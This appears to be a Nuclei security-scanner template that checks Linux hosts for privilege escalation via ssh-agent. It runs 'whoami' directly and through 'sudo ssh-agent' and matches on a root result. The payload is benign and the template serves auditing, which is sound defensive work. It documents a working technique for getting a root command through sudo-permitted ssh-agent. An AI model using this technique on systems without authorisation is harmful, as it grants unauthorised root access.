ssh-agent is a program that helps manage and store private keys used for SSH authentication. It is often used to hold the decrypted private keys in memory, allowing for seamless authentication to remote servers without the need to re-enter passphrases for the keys.
PoC代码[已公开]
id: privesc-ssh-agent
info:
name: ssh-agent - Privilege Escalation
author: daffainfo
severity: high
description: |
ssh-agent is a program that helps manage and store private keys used for SSH authentication. It is often used to hold the decrypted private keys in memory, allowing for seamless authentication to remote servers without the need to re-enter passphrases for the keys.
reference:
- https://gtfobins.github.io/gtfobins/ssh-agent/
metadata:
verified: true
max-request: 3
tags: code,linux,ssh-agent,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
ssh-agent whoami
- engine:
- sh
- bash
source: |
sudo ssh-agent whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a0047304502204e2fb64b9b5adb5fcdf7db3b287f52fef8feb7a65d1908b39e58e00c345c8514022100c16edc7143fda13e12eed4dbce5115586cc5afb90980f6fc42e35204df70316b:922c64590222798bb761d5b6d8e72950